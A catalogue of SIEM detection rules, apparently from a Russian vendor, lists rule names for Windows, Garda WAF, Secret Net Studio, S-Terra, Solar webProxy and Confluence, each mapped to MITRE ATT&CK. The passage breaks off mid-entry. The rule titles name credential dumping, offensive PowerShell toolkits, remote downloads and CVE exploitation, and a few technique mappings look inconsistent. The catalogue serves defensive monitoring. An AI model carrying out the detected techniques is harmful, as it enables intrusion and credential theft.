Microsoft	Windows	RV-D-318	Отключение снапшотов томов	TA0005 (Defense Evasion)	T1562.001 (Impair Defenses: Disable or Modify Tools)	Security, Sysmon
Microsoft	Windows	RV-D-319	Защита от записи для хранилища отключена	TA0005 (Defense Evasion)	-	Security, Sysmon
Microsoft	Windows	RV-D-320	Подозрительное выполнение Regasm/Regsvcs с нестандартным расширением	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution), T1218.009 (System Binary Proxy Execution: Regsvcs/Regasm)	Security, Sysmon
Microsoft	Windows	RV-D-321	Импорт ключа реестра из ADS	TA0005 (Defense Evasion)	T1112 (Modify Registry)	Security, Sysmon
Microsoft	Windows	RV-D-322	Скачивание файлов через Squirrel.exe	TA0011 (Command and Control)	T1105 (Ingress Tool Transfer)	Security, Sysmon
Microsoft	Windows	RV-D-323	Скачивание файлов средствами MS-AppInstaller	TA0011 (Command and Control)	T1105 (Ingress Tool Transfer)	Security, Sysmon
Microsoft	Windows	RV-D-324	Дамп памяти ядра через LiveKD	TA0006 (Credential Access)	T1003 (OS Credential Dumping)	Security, Sysmon
Microsoft	Windows	RV-D-325	Создание нового процесса с помощью Taskmgr.exe	TA0005 (Defense Evasion)	T1036 (Masquerading)	Security, Sysmon
Microsoft	Windows	RV-D-326	Необычный аргумент или дочерний процесс Wlrmdr.exe	TA0005 (Defense Evasion)	T1218 (System Binary Proxy Execution)	Security, Sysmon
Microsoft	Windows	RV-D-327	Подозрительный агент обновления Windows	TA0005 (Defense Evasion)	T1036 (Masquerading)	Security, Sysmon
Microsoft	Windows	RV-D-328	Изменение чувствительных параметров RDP	TA0005 (Defense Evasion), TA0003 (Persistence)	T1112 (Modify Registry)	Sysmon
Microsoft	Windows	RV-D-329	Порт RDP по умолчанию изменен на нестандартный	TA0005 (Defense Evasion)	T1547 (Boot or Logon Autostart Execution), T1547.010 (Boot or Logon Autostart Execution: Port Monitors)	Sysmon
Microsoft	Windows	RV-D-330	Изменена очередь загрузки драйвера Sysmon	TA0005 (Defense Evasion)	T1562.001 (Impair Defenses: Disable or Modify Tools)	Sysmon
Microsoft	Windows	RV-D-331	Изменение разрешения доступа к каналу Winevt через реестр.	TA0005 (Defense Evasion)	T1562.002 (Impair Defenses: Disable Windows Event Logging)	Sysmon
Microsoft	Windows	RV-D-332	Отключение в реестре HECI	TA0005 (Defense Evasion)	T1562.001 (Impair Defenses: Disable or Modify Tools)	Sysmon
Microsoft	Windows	RV-D-333	Отключение Административных общих ресурсов при запуске.	TA0005 (Defense Evasion)	T1070 (Indicator Removal), T1070.005 (Indicator Removal: Network Share Connection Removal)	Sysmon
Microsoft	Windows	RV-D-334	Отключение Privacy Settings Experience в реестре.	TA0005 (Defense Evasion)	T1562.001 (Impair Defenses: Disable or Modify Tools)	Sysmon
Microsoft	Windows	RV-D-335	Отключение контроль учетных записей пользователей (UAC) в реестре.	TA0004 (Privilege Escalation), TA0005 (Defense Evasion)	T1548 (Abuse Elevation Control Mechanism), T1548.002 (Abuse Elevation Control Mechanism: Bypass User Account Control)	Sysmon
Microsoft	Windows	RV-D-336	Включение в реестре DNS-over-HTTPS.	TA0005 (Defense Evasion)	T1112 (Modify Registry), T1490 (Inhibit System Recovery)	Sysmon
Microsoft	Windows	RV-D-337	Установка нового значения DNS ServerLevelPluginDll	TA0005 (Defense Evasion)	T1112 (Modify Registry), T1574 (Hijack Execution Flow), T1574.002 (DLL Side-Loading)	Sysmon
Microsoft	Windows	RV-D-338	Подозрительная модификация ключей реестра COM/WMI	TA0005 (Defense Evasion)	T1562.001 (Impair Defenses: Disable or Modify Tools)	Sysmon
Microsoft	Windows	RV-D-339	Модификация скрытых ключей Проводника	TA0005 (Defense Evasion)	T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)	Sysmon
Microsoft	Windows	RV-D-340	Скрытие задачи по расписанию с помощью Index Value Tamper	TA0005 (Defense Evasion)	T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)	Sysmon
Microsoft	Windows	RV-D-341	Подозрительный путь в значении реестра Keyboard Layout IME	TA0005 (Defense Evasion)	T1562.001 (Impair Defenses: Disable or Modify Tools)	Sysmon
Microsoft	Windows	RV-D-342	Включение хранение хеша LM	TA0005 (Defense Evasion)	T1112 (Modify Registry)	Sysmon
Microsoft	Windows	RV-D-343	Загрузка модуля в процесс regsvr32 из нестандартного пути	TA0005 (Defense Evasion), TA0002 (Execution)	T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.010 (System Binary Proxy Execution: Regsvr32)	Sysmon
Microsoft	Windows	RV-D-344	Выполнение скриптов через regsvr32	TA0005 (Defense Evasion), TA0002 (Execution)	T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.010 (System Binary Proxy Execution: Regsvr32)	Sysmon
Microsoft	Windows	RV-D-345	Загрузка модуля в процесс rundll32 из нестандартного пути	TA0005 (Defense Evasion), TA0002 (Execution)	T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.011 (System Binary Proxy Execution: Rundll32)	Sysmon
Microsoft	Windows	RV-D-346	Загрузка процессом rundll32 модулей для выполнения скриптов	TA0005 (Defense Evasion), TA0002 (Execution)	T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.011 (System Binary Proxy Execution: Rundll32)	Sysmon
Microsoft	Windows	RV-D-347	Ослабление защиты или мониторинга системы	TA0005 (Defense Evasion)	T1562.001 (Impair Defenses: Disable or Modify Tools)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-348	Закрепление через ключ реестра ReflectDebugger утилиты WerFault	TA0005 (Defense Evasion), TA0003 (Persistence)	T1036 (Masquerading), T1036.003 (Masquerading: Rename Legitimate Utilities), T1112 (Modify Registry)	Security, Sysmon
Microsoft	Windows	RV-D-349	Обнаружен запуск XSL скрипта	TA0005 (Defense Evasion)	T1220 (XSL Script Processing)	Security, Sysmon
Microsoft	Windows	RV-D-350	Зафиксирована разведка учетных записей	TA0007 (Discovery)	T1059 (Command and Scripting Interpreter), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1087.002 (Account Discovery: Domain Account)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-351	Разведка системы при помощи WMI	TA0007 (Discovery)	T1047 (Windows Management Instrumentation), T1592 (Gather Victim Host Information), T1592.004 (Gather Victim Host Information: Client Configurations)	Security
Microsoft	Windows	RV-D-352	Разведка процессов	TA0007 (Discovery)	T1047 (Windows Management Instrumentation), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1592 (Gather Victim Host Information), T1592.002 (Gather Victim Host Information: Software)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-353	Разведка доменных трастов	TA0002 (Execution), TA0007 (Discovery)	T1059 (Command and Scripting Interpreter), T1482 (Domain Trust Discovery), T1590 (Gather Victim Network Information), T1590.003 (Gather Victim Network Information: Network Trust Dependencies)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-354	Зафиксировано изучение общих сетевых ресурсов	TA0007 (Discovery)	T1047 (Windows Management Instrumentation), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1135 (Network Share Discovery)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-355	Выполнение Sysinternals PsSuspend	TA0007 (Discovery), TA0003 (Persistence)	T1543 (Create or Modify System Process), T1543.003 (Create or Modify System Process: Windows Service)	Security, Sysmon
Microsoft	Windows	RV-D-356	Перечисление ключей реестра для разведки	TA0007 (Discovery)	T1012 (Query Registry)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-357	Перечисление ключей реестра, которые могут быть интересны при разведке	TA0007 (Discovery)	T1012 (Query Registry)	Security
Microsoft	Windows	RV-D-358	Выполнение разведки удаленных систем	TA0007 (Discovery)	T1018 (Remote System Discovery), T1047 (Windows Management Instrumentation), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-359	Изучение конфигурации локальной системы	TA0007 (Discovery)	T1047 (Windows Management Instrumentation), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1082 (System Information Discovery), T1592 (Gather Victim Host Information), T1592.004 (Gather Victim Host Information: Client Configurations)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-360	Сбор информации о сетевых подключениях	TA0007 (Discovery)	T1049 (System Network Connections Discovery), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-361	Зафиксировано изучение системного времени	TA0007 (Discovery)	T1047 (Windows Management Instrumentation), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1124 (System Time Discovery)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-362	Запуск whoami с правами системы	TA0007 (Discovery)	T1033 (System Owner/User Discovery)	Security, Sysmon
Microsoft	Windows	RV-D-363	Запуск интерпретатора командной строки от WinRAR	TA0002 (Execution), TA0005 (Defense Evasion)	T1027.015 (Obfuscated Files or Information: Compression), T1203 (Exploitation for Client Execution)	Security, Sysmon
Microsoft	Windows	RV-D-364	Эксплуатация уязвимости CVE-2023-46944 в расширении GitLens для VSCode на Windows	TA0002 (Execution)	T1203 (Exploitation for Client Execution)	Security, Sysmon
Microsoft	Windows	RV-D-365	Зафиксировано использование хакерской утилиты DSInternals	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1201 (Password Policy Discovery), T1484 (Domain or Tenant Policy Modification), T1558 (Steal or Forge Kerberos Tickets)	PowerShell
Microsoft	Windows	RV-D-366	Зафиксировано использование хакерской утилиты nishang	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1003.002 (OS Credential Dumping: Security Account Manager), T1005 (Data from Local System), T1027 (Obfuscated Files or Information), T1027.010 (Obfuscated Files or Information: Command Obfuscation), T1041 (Exfiltration Over C2 Channel), T1046 (Network Service Discovery), T1056 (Input Capture), T1056.001 (Input Capture: Keylogging), T1056.002 (Input Capture: GUI Input Capture), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1082 (System Information Discovery), T1087 (Account Discovery), T1102 (Web Service), T1105 (Ingress Tool Transfer), T1218 (System Binary Proxy Execution), T1218.004 (System Binary Proxy Execution: InstallUtil), T1218.011 (System Binary Proxy Execution: Rundll32), T1547 (Boot or Logon Autostart Execution), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder), T1564 (Hide Artifacts), T1564.004 (Hide Artifacts: NTFS File Attributes), T1566 (Phishing)	PowerShell
Microsoft	Windows	RV-D-367	Зафиксировано использование хакерской утилиты OWA-Toolkit	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1114 (Email Collection), T1133 (External Remote Services), T1560 (Archive Collected Data)	PowerShell
Microsoft	Windows	RV-D-368	Зафиксировано использование хакерской утилиты PowerShell-Suit	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1021 (Remote Services), T1021.006 (Remote Services: Windows Remote Management), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)	PowerShell
Microsoft	Windows	RV-D-369	Зафиксировано использование хакерской утилиты PowerShellArsenal	TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1021 (Remote Services), T1021.006 (Remote Services: Windows Remote Management), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)	PowerShell
Microsoft	Windows	RV-D-370	Загрузка файлов с удаленного сервера при помощи PowerShell	TA0008 (Lateral Movement)	T1021 (Remote Services), T1021.004 (Remote Services: SSH), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1105 (Ingress Tool Transfer), T1566 (Phishing), T1566.002 (Phishing: Spearphishing Link)	PowerShell
Microsoft	Windows	RV-D-371	Зафиксировано возможное использование обфускации Powesrhell	TA0005 (Defense Evasion)	T1027 (Obfuscated Files or Information), T1027.010 (Obfuscated Files or Information: Command Obfuscation), T1027.015 (Obfuscated Files or Information: Compression), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)	PowerShell
Microsoft	Windows	RV-D-372	Зафиксирована маскировка запуска PowerShell	TA0005 (Defense Evasion)	T1036 (Masquerading), T1036.005 (Masquerading: Match Legitimate Resource Name or Location), T1036.006 (Masquerading: Match Legitimate Resource Name or Location), T1036.007 (Masquerading: Double File Extension), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)	Sysmon
Microsoft	Windows	RV-D-373	Зафиксировано использование WinApi через PowerShell	TA0005 (Defense Evasion)	T1027 (Obfuscated Files or Information), T1055 (Process Injection), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1106 (Native API)	PowerShell
Microsoft	Windows	RV-D-374	Зафиксировано использование хакерской утилиты PowerSploit	TA0005 (Defense Evasion), TA0004 (Privilege Escalation), TA0003 (Persistence), TA0006 (Credential Access)	T1003 (OS Credential Dumping), T1005 (Data from Local System), T1006 (Direct Volume Access), T1012 (Query Registry), T1027 (Obfuscated Files or Information), T1027.005 (Obfuscated Files or Information: Indicator Removal from Tools), T1027.010 (Obfuscated Files or Information: Command Obfuscation), T1047 (Windows Management Instrumentation), T1053 (Scheduled Task/Job), T1053.002 (Scheduled Task/Job: At), T1053.005 (Scheduled Task/Job: Scheduled Task), T1055 (Process Injection), T1055.001 (Process Injection: Dynamic-link Library Injection), T1056 (Input Capture), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1113 (Screen Capture), T1123 (Audio Capture), T1134 (Access Token Manipulation), T1212 (Exploitation for Credential Access), T1222 (File and Directory Permissions Modification), T1222.001 (File and Directory Permissions Modification: Windows File and Directory Permissions Modification), T1482 (Domain Trust Discovery), T1543 (Create or Modify System Process), T1543.003 (Create or Modify System Process: Windows Service), T1547 (Boot or Logon Autostart Execution), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder), T1547.005 (Boot or Logon Autostart Execution: Security Support Provider), T1552 (Unsecured Credentials), T1552.002 (Unsecured Credentials: Credentials in Registry), T1552.006 (Unsecured Credentials: Group Policy Preferences), T1555 (Credentials from Password Stores), T1555.004 (Credentials from Password Stores: Windows Credential Manager), T1558 (Steal or Forge Kerberos Tickets), T1558.003 (Steal or Forge Kerberos Tickets: Kerberoasting), T1574 (Hijack Execution Flow), T1574.001 (Hijack Execution Flow: DLL), T1574.007 (Hijack Execution Flow: Path Interception by PATH Environment Variable), T1574.008 (Hijack Execution Flow: Path Interception by Search Order Hijacking), T1574.009 (Hijack Execution Flow: Path Interception by Unquoted Path), T1588 (Obtain Capabilities), T1588.002 (Obtain Capabilities: Tool), T1620 (Reflective Code Loading)	PowerShell
Microsoft	Windows	RV-D-375	Зафиксировано использование хакерской утилиты PSMapExec	TA0008 (Lateral Movement)	T1021 (Remote Services), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1078 (Valid Accounts), T1558 (Steal or Forge Kerberos Tickets), T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket), T1569 (System Services)	PowerShell
Microsoft	Windows	RV-D-376	Зафиксировано использование хакерской утилиты SharpHound	TA0007 (Discovery)	T1018 (Remote System Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1482 (Domain Trust Discovery)	PowerShell
Microsoft	Windows	RV-D-377	Создание запланированной задачи через FileCreation	TA0002 (Execution), TA0003 (Persistence), TA0004 (Privilege Escalation)	T1053 (Scheduled Task/Job), T1053.005 (Scheduled Task/Job: Scheduled Task)	Sysmon
Microsoft	Windows	RV-D-378	Процесс загрузил модуль по UNC-пути	TA0002 (Execution)	T1129 (Shared Modules)	Sysmon
Microsoft	Windows	RV-D-379	URL-схема в командной строке процесса	TA0002 (Execution)	T1129 (Shared Modules)	Security
Microsoft	Windows	RV-D-380	Использование вредоносных утилит	TA0005 (Defense Evasion), TA0002 (Execution)	T1006 (Direct Volume Access), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell)	PowerShell, Security, Sysmon
Microsoft	Windows	RV-D-381	PowerShell инициировал сетевое подключение	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)	Sysmon
Microsoft	Windows	RV-D-382	Эксплуатация уязвимости в WinRAR - CVE-2023-38831	TA0002 (Execution)	T1203 (Exploitation for Client Execution)	Sysmon
Microsoft	Windows	RV-D-383	Зафиксированы подозрительные операции при помощи WMI	-	-	Security
Microsoft	Windows	RV-D-384	Потенциальное выполнение скрипта через WScript/CScript	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.005 (Command and Scripting Interpreter: Visual Basic), T1059.007 (Command and Scripting Interpreter: JavaScript)	Security, Sysmon
Microsoft	Windows	RV-D-385	Использование PowerShell через сторонние инструменты	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)	Sysmon
Microsoft	Windows	RV-D-386	Изменение пароля пользователя или хоста с помощью Ksetup.exe	TA0040 (Impact)	T1531 (Account Access Removal)	Security, Sysmon
Microsoft	Windows	RV-D-387	Добавление потенциально подозрительного источника загрузки в Winget	TA0011 (Command and Control)	T1105 (Ingress Tool Transfer)	Security, Sysmon
Microsoft	Windows	RV-D-388	Извлечение cab-файлов через Wusa.EXE	TA0002 (Execution)	-	Security, Sysmon
Microsoft	Windows	RV-D-389	Изменение политики выполнения PowerShell	TA0005 (Defense Evasion)	T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)	Sysmon
Microsoft	Windows	RV-D-390	Запуск скрипта из временной директории	TA0002 (Execution)	T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1059.005 (Command and Scripting Interpreter: Visual Basic), T1059.006 (Command and Scripting Interpreter: Python), T1059.007 (Command and Scripting Interpreter: JavaScript)	Security, Sysmon
Microsoft	Windows	RV-D-391	Создание Self Extracting Package в подозрительном месте	TA0002 (Execution)	T1218 (System Binary Proxy Execution)	Security, Sysmon
Microsoft	Windows	RV-D-392	Создание или изменение сервиса с помощью утилит в командной строке	TA0040 (Impact)	T1489 (Service Stop)	Security
Microsoft	Windows	RV-D-393	Создан сервис с подозрительными параметрами	TA0002 (Execution)	T1569 (System Services), T1569.002 (System Services: Service Execution)	Security
Microsoft	Windows	RV-D-394	Изменение критичных параметров сервиса	TA0002 (Execution)	T1569 (System Services), T1569.002 (System Services: Service Execution)	Security, Sysmon
Microsoft	Windows	RV-D-395	Изменение пути до исполняемого файла в сервисе нестандартными путями	TA0002 (Execution)	T1569 (System Services), T1569.002 (System Services: Service Execution)	Security, Sysmon

Вендор

Продукт

ID правила детектирования

Название правила детектирования

Тактика MITRE ATT&CK

Техника, сабтехника MITRE ATT&CK

Источник события

Все вендоры

RV-D-740

Обнаружен индикатор компрометации

TA0001 (Initial Access), TA0011 (Command and Control), TA0010 (Exfiltration)

T1041 (Exfiltration Over C2 Channel), T1071 (Application Layer Protocol), T1071.001 (Application Layer Protocol: Web Protocols), T1071.004 (Application Layer Protocol: DNS), T1105 (Ingress Tool Transfer), T1204 (User Execution), T1204.001 (User Execution: Malicious Link), T1219 (Remote Access Tools), T1566 (Phishing), T1566.001 (Phishing: Spearphishing Attachment), T1566.002 (Phishing: Spearphishing Link), T1566.003 (Phishing: Spearphishing via Service)

Гарда

Гарда WAF

RV-D-701

Подбор пароля пользователя к Garda WAF

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)

Гарда WAF

Гарда

Гарда WAF

RV-D-702

Атака Password Spraying к Garda WAF

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)

Гарда WAF

Гарда

Гарда WAF

RV-D-703

Успешный подбор пароля к Garda WAF

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing), T1110.003 (Brute Force: Password Spraying)

Гарда WAF

Гарда

Гарда WAF

RV-D-704

Отключение или изменение паттерна Garda WAF

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Гарда WAF

Гарда

Гарда WAF

RV-D-705

Атака на веб-приложение Garda WAF

TA0001 (Initial Access), TA0003 (Persistence)

T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)

Гарда WAF

Гарда

Гарда WAF

RV-D-706

Множественная атака на веб-приложение Garda WAF

TA0001 (Initial Access), TA0003 (Persistence)

T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)

Гарда WAF

Гарда

Гарда WAF

RV-D-707

Множественные атаки на веб-приложение Garda WAF

TA0001 (Initial Access), TA0003 (Persistence)

T1190 (Exploit Public-Facing Application), T1505 (Server Software Component), T1505.003 (Server Software Component: Web Shell)

Гарда WAF

Гарда

Гарда WAF

RV-D-708

Добавление пользователю критичной роли Garda WAF

TA0003 (Persistence)

T1098 (Account Manipulation), T1098.007 (Account Manipulation: Additional Local or Domain Groups)

Гарда WAF

Гарда

Гарда WAF

RV-D-723

Изменение настроек защиты подключенного сервера

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Гарда WAF

Гарда

Гарда WAF

RV-D-724

Массовое удаление УЗ Garda WAF

TA0040 (Impact)

T1531 (Account Access Removal)

Гарда WAF

Код Безопасности

Континент

RV-D-79

Успешный подбор пароля к серверу Континент TLS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Код Безопасности

Континент

RV-D-80

Подбор пароля к серверу Континент TLS

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Код Безопасности

Континент

RV-D-81

Подбор пароля Континент методом Password Spraying

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying)

Код Безопасности

Континент

RV-D-82

Вход привилегированного пользователя на устройство Континент с неизвестного хоста

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

Код Безопасности

Secret Net Studio

RV-D-496

Очищен журнал событий Secret Net Studio

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.009 (Indicator Removal: Clear Persistence)

SNS audit events

Код Безопасности

Secret Net Studio

RV-D-497

Вход пользователя из черного списка

TA0001 (Initial Access), TA0005 (Defense Evasion)

T1078 (Valid Accounts)

SNS audit events

Код Безопасности

Secret Net Studio

RV-D-498

Нарушение целостности объекта системы

TA0040 (Impact)

T1565 (Data Manipulation), T1565.001 (Data Manipulation: Stored Data Manipulation)

SNS audit events

Код Безопасности

Secret Net Studio

RV-D-499

Массовая разблокировка узлов Secret Net Studio

TA0005 (Defense Evasion)

T1211 (Exploitation for Defense Evasion)

SNS audit events

Код Безопасности

Secret Net Studio

RV-D-500

Массовая блокировка узлов Secret Net Studio

TA0040 (Impact)

T1499 (Endpoint Denial of Service)

SNS audit events

Код Безопасности

Secret Net Studio

RV-D-501

Изменение политики безопасности Secret Net Studio

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

SNS audit events

Код Безопасности

Secret Net Studio

RV-D-502

Многократная смена пароля учетной записи

TA0003 (Persistence), TA0040 (Impact)

T1098 (Account Manipulation), T1531 (Account Access Removal)

SNS audit events

Код Безопасности

Secret Net Studio

RV-D-503

Изменение правил межсетевого экрана в Secret Net Studio

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.004 (Impair Defenses: Disable or Modify System Firewall)

SNS audit events

Код Безопасности

Secret Net Studio

RV-D-504

Изменение критически важной учетной записи

TA0040 (Impact)

T1098 (Account Manipulation), T1531 (Account Access Removal)

SNS audit events

Код Безопасности

Secret Net Studio

RV-D-505

Отключение защитного механизма в Secret Net Studio

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

SNS audit events

Код Безопасности

Secret Net Studio

RV-D-506

Отключение механизма самозащиты в Secret Net Studio

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

SNS audit events

Код Безопасности

Secret Net Studio

RV-D-507

Подключено съемное устройство к компьютеру

TA0009 (Collection)

T1025 (Data from Removable Media)

SNS audit events

С-Терра СиЭсПи

С-Терра Шлюз

RV-D-520

Изменен пароль для привилегированного режима

TA0003 (Persistence)

T1098 (Account Manipulation)

С-Терра СиЭсПи

С-Терра Шлюз

RV-D-521

Создан пользователь на S-Terra Gate

TA0003 (Persistence)

T1098 (Account Manipulation), T1136 (Create Account), T1136.001 (Create Account: Local Account)

С-Терра СиЭсПи

С-Терра Шлюз

RV-D-522

Вход в привилегированный режим на S-Terra Gate

TA0004 (Privilege Escalation), TA0003 (Persistence)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts)

С-Терра СиЭсПи

С-Терра Шлюз

RV-D-523

Очищен файл конфигурации на S-Terra Gate

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.007 (Indicator Removal: Clear Network Connection History and Configurations)

С-Терра СиЭсПи

С-Терра Шлюз

RV-D-524

Подбор пароля для привилегированного режима

TA0006 (Credential Access)

T1110 (Brute Force)

С-Терра СиЭсПи

С-Терра Шлюз

RV-D-525

Настроена отправка логов на неизвестный узел

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.008 (Command and Scripting Interpreter: Network Device CLI)

С-Терра СиЭсПи

С-Терра Шлюз

RV-D-526

Выдача максимальных привилегий для пользователя

TA0004 (Privilege Escalation)

T1078 (Valid Accounts), T1078.003 (Valid Accounts: Local Accounts), T1098 (Account Manipulation), T1548 (Abuse Elevation Control Mechanism)

С-Терра СиЭсПи

С-Терра Шлюз

RV-D-527

Удален файл на S-Terra Gate

TA0040 (Impact)

T1485 (Data Destruction), T1136.001 (Create Account: Local Account), T1485.001 (Data Destruction: Lifecycle-Triggered Deletion)

С-Терра СиЭсПи

С-Терра Шлюз

RV-D-528

Отключена отправка событий на S-Terra Gate

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Солар

Solar webProxy

RV-D-199

Множественные неуспешные попытки аутентификации на системе SWP

TA0006 (Credential Access)

T1110 (Brute Force)

Солар

Solar webProxy

RV-D-200

Успешный подбор пароля пользователя на Solar Web Proxy

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Солар

Solar webProxy

RV-D-201

Изменены параметры внешних подключений на Solar Web Proxy

TA0005 (Defense Evasion)

T1562 (Impair Defenses)

Солар

Solar webProxy

RV-D-202

Изменение правил межсетевого экранирования и доступа в Solar Web Proxy

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools), T1562.004 (Impair Defenses: Disable or Modify System Firewall)

Солар

Solar webProxy

RV-D-203

Изменены критичные параметры системы Solar Web Proxy

TA0005 (Defense Evasion)

T1562 (Impair Defenses), T1562.001 (Impair Defenses: Disable or Modify Tools)

Солар

Solar webProxy

RV-D-204

Вход под привилегированной учетной записью с неизвестного IP на сервер SWP

TA0004 (Privilege Escalation)

T1078 (Valid Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1078.003 (Valid Accounts: Local Accounts)

Солар

Solar webProxy

RV-D-205

Создан новый пользователь в Solar Web Proxy

TA0003 (Persistence)

T1136 (Create Account), T1136.001 (Create Account: Local Account), T1136.002 (Create Account: Domain Account)

Солар

Solar webProxy

RV-D-206

Создание или изменение роли с критичными правами на Solar Web Proxy

TA0003 (Persistence)

T1098 (Account Manipulation)

Солар

Solar webProxy

RV-D-207

Изменены параметры учетной записи на Solar Web Proxy

TA0003 (Persistence), TA0004 (Privilege Escalation)

T1098 (Account Manipulation)

Atlassian

Confluence

RV-D-24

Выгрузка множества страниц Confluence

TA0009 (Collection)

T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence)

confluence_access.log, access.log

Atlassian

Confluence

RV-D-25

Выгрузка пространства Confluence

TA0009 (Collection)

T1213 (Data from Information Repositories), T1213.001 (Data from Information Repositories: Confluence)

confluence_access.log, access.log

Atlassian

Confluence

RV-D-26

Множественные попытки входа на веб-сервер Confluence

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

confluence_access.log, access.log

Atlassian

Confluence

RV-D-27

Отключение аудита журналов приложения Confluence

